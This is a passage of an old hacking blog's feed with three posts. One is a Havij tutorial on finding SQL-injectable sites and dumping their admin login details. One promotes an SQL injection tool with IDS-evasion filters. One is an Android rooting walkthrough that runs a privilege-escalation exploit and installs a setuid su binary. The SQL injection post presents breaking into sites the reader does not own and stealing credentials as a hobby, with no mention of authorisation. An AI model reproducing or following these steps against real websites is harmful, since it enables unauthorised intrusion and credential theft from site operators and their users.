href=&quot;http://2.bp.blogspot.com/-YTQF_g6GPdI/TgGOMgXgQlI/AAAAAAAAAeM/EAsOj88U7Kk/s1600/untitled.bmp&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; 
src=&quot;http://2.bp.blogspot.com/-YTQF_g6GPdI/TgGOMgXgQlI/AAAAAAAAAeM/EAsOj88U7Kk/s1600/untitled.bmp&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Hello friends. This is my third post on SQL injection and for the first time I am using a tool for explaining it. Here I will be using a popular SQLi tool and my personal favourite, Havij. To download Havij visit the following link - &lt;b&gt;&lt;a href=&quot;http://hackingalert.blogspot.com/2011/07/download-havij-15-most-advanced-sql.html&quot; target=&quot;_blank&quot;&gt;DOWNLOAD HAVIJ&lt;/a&gt;.&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;/b&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;Let us now understand how this tool works. The tutorial can be used for any SQLi tool as the basic functioning is the same for all. First thing you need to do is find a vulnerable site.&lt;br /&gt;You can find a detailed SQL injection tutorial - &lt;a href=&quot;http://hackingalert.blogspot.com/2011/10/basic-sql-injection-tutorial-readers.html&quot; target=&quot;_blank&quot;&gt;HERE&lt;/a&gt;.&lt;br /&gt;You can use blind SQL injection technique to figure out whether a site is vulnerable or not.&lt;br /&gt;To check a website for vulnerability, you will first have to reach a page that accesses the database and is of the form : &lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;www.site.com/product.php?id=23&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Now simply add an apostrophe ( &#39; ) to the end of the url and press enter. If the website replies with a database error, the quote has reached the SQL query unescaped, which indicates that the website is likely vulnerable to SQL injection. Look at the url in the following image( sorry for the over editing of image but it was really needed) .
Notice the &#39; at the end of url and also the error responded from the database.&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://4.bp.blogspot.com/-3r1UJ-VcXdk/TtkqIehdOBI/AAAAAAAAA68/tYmKae0kZJY/s1600/sql0.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;290&quot; src=&quot;http://4.bp.blogspot.com/-3r1UJ-VcXdk/TtkqIehdOBI/AAAAAAAAA68/tYmKae0kZJY/s640/sql0.PNG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;The error will look something like this :&amp;nbsp;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;Warning: mysql_num_rows(): supplied argument is not a valid MySQL&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;So now that we have a vulnerable site for testing, we will now move ahead with using Havij and try to discover admin details of the website. In fact we can dig out every detail from the database using havij. Let us see how.&lt;br /&gt;&lt;br /&gt;1. Start Havij and copy the url in TARGET address.( the same url which we used to test for sql injection vulnerability but without &#39; ).&lt;br /&gt;&lt;br /&gt;2. Click on the ANALYZE button and wait for Havij to discover the database files for you.&lt;br /&gt;&lt;br /&gt;3. 
At the bottom of the Havij terminal you will see the search progress.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-03OAZQ5TiBI/TtkrdN7oimI/AAAAAAAAA7E/kWsuCQajeaI/s1600/sql1.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;320&quot; src=&quot;http://1.bp.blogspot.com/-03OAZQ5TiBI/TtkrdN7oimI/AAAAAAAAA7E/kWsuCQajeaI/s320/sql1.PNG&quot; width=&quot;315&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;4. Once a database is found, you can click on TABLES tab to view the available tables.&lt;br /&gt;&lt;br /&gt;You will be presented with all the tables that are available in the database of the website. It contains all the information that is displayed on the webpage. The next target can be to look for a table that contains some information about admin login details. .&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://4.bp.blogspot.com/-TdDRolcFrrY/TtktFqCAcpI/AAAAAAAAA7U/ChajEPmAg68/s1600/sql2.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;552&quot; src=&quot;http://4.bp.blogspot.com/-TdDRolcFrrY/TtktFqCAcpI/AAAAAAAAA7U/ChajEPmAg68/s640/sql2.PNG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;5. In our example the table tbl_admin looks like a table that may contain admin details. 
Select that table and click on GET COLUMNS.&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-ozcwApvWLKc/TtkuKdX9ExI/AAAAAAAAA7c/1vVFonHvJbQ/s1600/sql3.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;272&quot; src=&quot;http://2.bp.blogspot.com/-ozcwApvWLKc/TtkuKdX9ExI/AAAAAAAAA7c/1vVFonHvJbQ/s640/sql3.PNG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;br /&gt;6. You will be listed with various columns that are present in the table.&lt;br /&gt;&lt;br /&gt;7. Now select those columns whose data you want to retrieve.&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-edi_v0fUNcs/Ttkuen7_IFI/AAAAAAAAA7k/SqNAZKuBSH0/s1600/sql4.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;326&quot; src=&quot;http://3.bp.blogspot.com/-edi_v0fUNcs/Ttkuen7_IFI/AAAAAAAAA7k/SqNAZKuBSH0/s640/sql4.PNG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;8. After selecting the various columns, click on GET DATA to get the values stored in the columns.&lt;br /&gt;You can see in the figure how Havij has successfully retrieved the admin login details for us.&lt;br /&gt;&lt;br /&gt;This technique can also be used to dig out the other user details of the website. Keep experimenting.&lt;br /&gt;&lt;br /&gt;Well I will leave you with a question . What to do with this admin details now ??&lt;br /&gt;wait for the next post for answer. 
In case you have an answer then add it in comments below.&lt;br /&gt;&lt;br /&gt;DARKLORD!!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingalert.blogspot.com/feeds/2756732865095606856/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackingalert.blogspot.com/2011/12/complete-sql-injection-tutorial-with.html#comment-form' title='11 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/2756732865095606856'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/2756732865095606856'/><link rel='alternate' type='text/html' href='http://hackingalert.blogspot.com/2011/12/complete-sql-injection-tutorial-with.html' title='Complete SQL injection tutorial with Havij'/><author><name>abhinav singh</name><uri>http://www.blogger.com/profile/03102629587741077690</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://2.bp.blogspot.com/_MMJcoBRgsn4/SemPx5VvY3I/AAAAAAAAAA4/VZyEY96SW6o/S220/abhinavbom.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-YTQF_g6GPdI/TgGOMgXgQlI/AAAAAAAAAeM/EAsOj88U7Kk/s72-c/untitled.bmp" height="72" width="72"/><thr:total>11</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7708828398385990720.post-30269175375138666</id><published>2011-12-02T18:28:00.001+05:30</published><updated>2011-12-09T18:29:32.782+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="hacking software"/><category scheme="http://www.blogger.com/atom/ns#" term="sql injection tool"/><title type='text'>The Mole - New SQL injection tool+tutorial</title><content type='html'>&lt;div dir=&quot;ltr&quot; 
style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;script src=&quot;http://connect.facebook.net/en_US/all.js#xfbml=1&quot;&gt;&lt;/script&gt;&lt;fb:like font=&quot;arial&quot; href=&quot;http://www.facebook.com/pages/HackingAlert/131456493581478&quot; layout=&quot;button_count&quot; show_faces=&quot;true&quot; width=&quot;450&quot;&gt;&lt;/fb:like&gt;&lt;br /&gt;&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://4.bp.blogspot.com/-eUEsurBldAc/TtjMp2Fk9_I/AAAAAAAAA60/-DhNfMlP0Sg/s1600/www.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;133&quot; src=&quot;http://4.bp.blogspot.com/-eUEsurBldAc/TtjMp2Fk9_I/AAAAAAAAA60/-DhNfMlP0Sg/s200/www.jpg&quot; width=&quot;200&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;The Mole is an automatic SQL Injection exploitation tool. Only by providing a vulnerable URL and a valid string on the site it can detect the injection and exploit it, either by using the union technique or a boolean query based technique.&lt;br /&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: large;&quot;&gt;&lt;b&gt;Features&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Support for injections using Mysql, SQL Server, Postgres and Oracle databases.&lt;br /&gt;&lt;br /&gt;Command line interface. 
Different commands trigger different actions.&lt;br /&gt;&lt;br /&gt;Auto-completion for commands, command arguments and database, table and columns names.&lt;br /&gt;&lt;br /&gt;Support for query filters, in order to bypass certain IPS/IDS rules using generic filters, and the possibility of creating new ones easily.&lt;br /&gt;&lt;br /&gt;Developed in python 3.&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;http://themole.sourceforge.net/?q=tutorial&quot; target=&quot;_blank&quot;&gt;Download tutorial&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;http://adf.ly/47oir&quot; target=&quot;_blank&quot;&gt;Download Mole for Winodws&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;http://adf.ly/47okA&quot; target=&quot;_blank&quot;&gt;Download Mole for Linux&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingalert.blogspot.com/feeds/30269175375138666/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackingalert.blogspot.com/2011/12/mole-new-sql-injection-tooltutorial.html#comment-form' title='11 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/30269175375138666'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/30269175375138666'/><link rel='alternate' type='text/html' href='http://hackingalert.blogspot.com/2011/12/mole-new-sql-injection-tooltutorial.html' title='The Mole - New SQL injection tool+tutorial'/><author><name>abhinav singh</name><uri>http://www.blogger.com/profile/03102629587741077690</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://2.bp.blogspot.com/_MMJcoBRgsn4/SemPx5VvY3I/AAAAAAAAAA4/VZyEY96SW6o/S220/abhinavbom.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" 
url="http://4.bp.blogspot.com/-eUEsurBldAc/TtjMp2Fk9_I/AAAAAAAAA60/-DhNfMlP0Sg/s72-c/www.jpg" height="72" width="72"/><thr:total>11</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7708828398385990720.post-6345778314367890574</id><published>2011-11-27T00:22:00.000+05:30</published><updated>2011-11-27T00:23:06.973+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="android hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="technical article"/><title type='text'>Rooting An Android Phone From Scratch - My Experiments with Truth!!</title><content type='html'>&lt;script src=&quot;http://connect.facebook.net/en_US/all.js#xfbml=1&quot;&gt;&lt;/script&gt;&lt;fb:like href=&quot;http://www.facebook.com/pages/HackingAlert/131456493581478&quot; layout=&quot;button_count&quot; show_faces=&quot;true&quot; width=&quot;450&quot; font=&quot;arial&quot;&gt;&lt;/fb:like&gt;&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-nt_lqXVPyn4/TtE04rYLgjI/AAAAAAAAA6s/h3DXGbg-TNY/s1600/an7.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;200&quot; src=&quot;http://1.bp.blogspot.com/-nt_lqXVPyn4/TtE04rYLgjI/AAAAAAAAA6s/h3DXGbg-TNY/s200/an7.PNG&quot; width=&quot;127&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Hello Friends. From past 3 days I was on an rooting rampage with my HTC Tattoo android phone. I was a fan of Android before I ever rooted my phone and now I am in love with it since I have rooted it. The real power of any operating system lies when you have the command of the super user. This is what rooting is all about.&lt;br /&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;Rooting a device needs two things. 
First the right set of files for rooting and second the courage to play with a 12,000 Rs phone that you bought by saving your earnings ( the cost of phone may vary depending upon the heaviness of your&amp;nbsp;surname). These days I started small development work on android to learn its basics. I am looking forward to diving deep into this mobile OS. For the past few days I was very much troubled with the word &quot;rooting&quot; and was getting really restless about it. Finally I decided on 23-11-2011 to sit down, leave all work and start my work on android rooting. So I started with working on android SDK first. Working of Android SDK is fairly simple and is just like the linux command line ( in fact it is a unix command line). After getting an overview of the basics of android-windows-sdk , I switched on to look for various commands and mode of working of it. Then I moved ahead to root my android phone. And finally after a struggle of 3 days I rooted my phone and installed a custom ROM. Oops I forgot to define what rooting is.&lt;br /&gt;&lt;br /&gt;Rooting means to gain permissions of a superuser or the root user in any Unix based OS. This is a universal&amp;nbsp;definition&amp;nbsp;for a unix based OS which contains a special super user called root.&lt;br /&gt;So to gain&amp;nbsp;privilege&amp;nbsp;of root is called rooting.&lt;br /&gt;Android sdk also contains a superb tool called Android Debug Bridge (ADB). It is a tool that is used to send commands to the android device using a laptop/PC. We will be extensively using it in this experiment.&lt;br /&gt;&lt;br /&gt;Well there are lots of excellent rooting tutorials and videos available on the internet for free. You can find lots of useful resources. I will recommend you to check the threads of xda-developers forum which has some of the finest posts on rooting android phone. The main reason for creating this post is to let my readers gain interest in exploring things.
The fun of gadgets is not just in using them. The real fun lies in technically playing with them. So I am creating this post to encourage my readers to explore their android devices ( rather spoil!! ) and feel their power.&lt;br /&gt;I still tried to remain a bit different from&amp;nbsp;various&amp;nbsp;sources I found on the&amp;nbsp;internet&amp;nbsp;and which I used to root my phone. What I have done here is I have created a single archive called tattoo.rar which can be downloaded from here - &lt;a href=&quot;http://rapidshare.com/files/403766494/Tattoo.rar.html&quot;&gt;DOWNLOAD.&amp;nbsp;&lt;/a&gt;&lt;br /&gt;This file can be&amp;nbsp;directly&amp;nbsp;downloaded and unzipped to any drive. Then by using the set of commands below you can get root&amp;nbsp;privilege&amp;nbsp;on your phone and later on install a higher version of Android ROM on it.&lt;br /&gt;&lt;br /&gt;Before we&amp;nbsp;begin&amp;nbsp;we will have to download the android sdk. It can be downloaded from &lt;a href=&quot;http://developer.android.com/sdk/index.html&quot;&gt;HERE.&lt;/a&gt;&amp;nbsp;Once you have downloaded it, unzip it to any drive, say C drive. Open the folder and run SDKmanager.exe . If you are running it for the first time then it will show you a list of packages that you can install.&lt;br /&gt;You will have to install just one package for the time being.
That is Android-sdk platform tools.&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-pJTx70ir2hs/TtEoSuP9dJI/AAAAAAAAA6M/L9JadlH4Vmk/s1600/an1.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;286&quot; src=&quot;http://2.bp.blogspot.com/-pJTx70ir2hs/TtEoSuP9dJI/AAAAAAAAA6M/L9JadlH4Vmk/s400/an1.PNG&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Once you have finished installing the package the next thing you can do is add the SDK tool folders to the PATH environment variable. This is an optional step but it can speed up your process of working.&lt;br /&gt;To set up the environment variables right click on My Computer, go to Properties, then Advanced System Settings , then Environment Variables. In System Variables, look for PATH. Double click on it to edit it. Then add the following path in it :&lt;br /&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&lt;i&gt;;c:\android-sdk-windows\tools;c:\android-sdk-windows\platform-tools&lt;/i&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Now you are all set. To check what you have done, open command prompt and type&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt; adb&lt;/span&gt;. You will see a list of options.&lt;br /&gt;Now coming back to the downloaded file, tattoo.rar. Unzip it to any folder of your choice. Suppose I unzipped it in my c drive.&lt;br /&gt;Now start command prompt and change directory to c:/tattoo&lt;br /&gt;Your prompt should look something like this : c:/tattoo&amp;gt;&lt;br /&gt;&lt;br /&gt;Now plug your HTC tattoo to USB.
At the command prompt type the following command;&lt;br /&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;adb devices&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;If it shows a device listed, it means your device is connected and responding.&lt;br /&gt;Let us proceed. Now execute the following commands in the same sequence as mentioned.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;1. Let&#39;s say you have everything unpacked into C:\Tattoo&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;2. In your terminal (on your PC) type:&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;- adb shell &quot;mkdir /data/local/bin&quot; (if it returns an error it means that the directory already exists, just proceed)&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;- adb push m7 /data/local/bin/&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;- adb push su /data/local/bin/&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;- adb push flash_image /data/local/bin/&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;- adb push tattoo-hack.ko /data/local/bin/&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;- adb push recovery.img /sdcard&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;- adb push boot.img /sdcard&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: 
cyan;&quot;&gt;3. We have every needed file on the phone now. Type now (we are still in your terminal):&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;- adb shell&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;$ cd /data/local/bin&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;$ chmod 766 m7 (I don&#39;t retain this step as mandatory, so if this process fails, just proceed)&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;$ while ./m7 ; do : ; done&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;lots of text until you see something like &quot;wrote shell code&quot;, press enter 2 or 3 times enter to see:&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;#&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;4. 
Then perform this:&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;- # export LD_LIBRARY_PATH=/system/lib&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;- # export PATH=/system/bin&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;- # insmod ./tattoo-hack.ko&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;- # mount -o rw,remount /dev/block/mtdblock5 /data&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;- # mount -o rw,remount /dev/block/mtdblock3 /system&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;- # cat ./su &amp;gt; /system/bin/su&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;- # chmod 4755 /system/bin/su&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;- # chmod 755 ./flash_image&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Successful execution of these commands will root your device, and you now have full rights on your HTC Tattoo phone. Keep in mind that the chmod 4755 step leaves a setuid-root su binary in /system/bin, so any app or shell user that runs it gets root as well, unless that su binary itself restricts who may call it.&lt;br /&gt;Now, how do you check whether rooting was successful? To check it, switch off your phone. Now press the &quot;Home&quot; key and then power it on. 
You will see a recovery screen similar to the one in figure.&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-qMCwZ2DzXFk/TtEvQX1KPaI/AAAAAAAAA6U/rIZR7YETYQ4/s1600/an4.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;http://3.bp.blogspot.com/-qMCwZ2DzXFk/TtEvQX1KPaI/AAAAAAAAA6U/rIZR7YETYQ4/s400/an4.png&quot; width=&quot;300&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;As you can see you are now presented with certain boot options which were previously not available for you. Now along with rooting the device with the set of commands mentioned above, we also flashed the SD card so that it becomes capable of installing custom ROM&#39;s. Custom ROM&#39;s are developed using a perticular version of android with a different interface. Installing a custom ROM can enhance your mobile performance. You can find lots of custom ROM available on the internet. I would recommend to check out this page - &lt;a href=&quot;http://theunlockr.com/category/roms-2/android-roms-2/htc-tattoo-roms/&quot;&gt;Custom ROM&lt;/a&gt;. It has whole list of custom ROM&#39;s for HTC Tattoo.&lt;br /&gt;I chose a custom ROM based on Android 2.3 Gingerbred so as to upgrade my old Android 1.6 pre-installed OS. This is the biggest advantage of rooting. You can install higher versions of OS even if the manufacturer is not producing updates. All you have to do is simply download a custom ROM and copy it in the SD card. Dont copy in any folder, just inside the card in zip format. Now in the above image you will find an option &quot;install zip from SD card&quot;. 
Once you click on it you will be presented with a screen similar to the one shown below :&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://4.bp.blogspot.com/-6gAf_lcenNY/TtExo3WyAmI/AAAAAAAAA6c/2JLun8fu5v0/s1600/an5.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;320&quot; src=&quot;http://4.bp.blogspot.com/-6gAf_lcenNY/TtExo3WyAmI/AAAAAAAAA6c/2JLun8fu5v0/s320/an5.PNG&quot; width=&quot;241&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;You can see the two zip custom ROMs available on my SD card which I had copied. Now I can select any one of them and install it on my phone. Once the installation is complete, reboot your phone and you are ALLLLL DDOONNEE !!&lt;br /&gt;&lt;br /&gt;Finally you will have a new version of android installed on your phone.&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-69tr7WDHs-A/TtEyS2BMFYI/AAAAAAAAA6k/eRKY0BXqV4s/s1600/an6.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;320&quot; src=&quot;http://3.bp.blogspot.com/-69tr7WDHs-A/TtEyS2BMFYI/AAAAAAAAA6k/eRKY0BXqV4s/s320/an6.PNG&quot; width=&quot;269&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;i&gt;SPECIAL NOTE&lt;/i&gt;&lt;/b&gt; : Rooting has certain advantages but it has disadvantages too. There can be several&amp;nbsp;components&amp;nbsp;which might not function properly. So before installing any custom ROM make sure it has all the basic common functions. Like in my case the&amp;nbsp;Camera&amp;nbsp;is not working but the battery usage and speed has increased greatly. 
Also there are numerous One-Click Root applications available for android devices who can automatically root your phone but I would&amp;nbsp;recommend&amp;nbsp;that you go for this manual&amp;nbsp;approach&amp;nbsp;it will give &amp;nbsp;better understanding.&lt;br /&gt;&lt;br /&gt;Hope you enjoyed reading this tutorial. If you too have a HTC Tattoo and you are bored of Dounut then dont wait, just jump to GingerBred. I bet you will love it.&lt;br /&gt;Do Leave your comments and suggestions.&lt;br /&gt;&lt;br /&gt;DARKLORD!!&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingalert.blogspot.com/feeds/6345778314367890574/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackingalert.blogspot.com/2011/11/rooting-android-phone-from-scratch-my.html#comment-form' title='9 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/6345778314367890574'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/6345778314367890574'/><link rel='alternate' type='text/html' href='http://hackingalert.blogspot.com/2011/11/rooting-android-phone-from-scratch-my.html' title='Rooting An Android Phone From Scratch - My Experiments with Truth!!'/><author><name>abhinav singh</name><uri>http://www.blogger.com/profile/03102629587741077690</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' 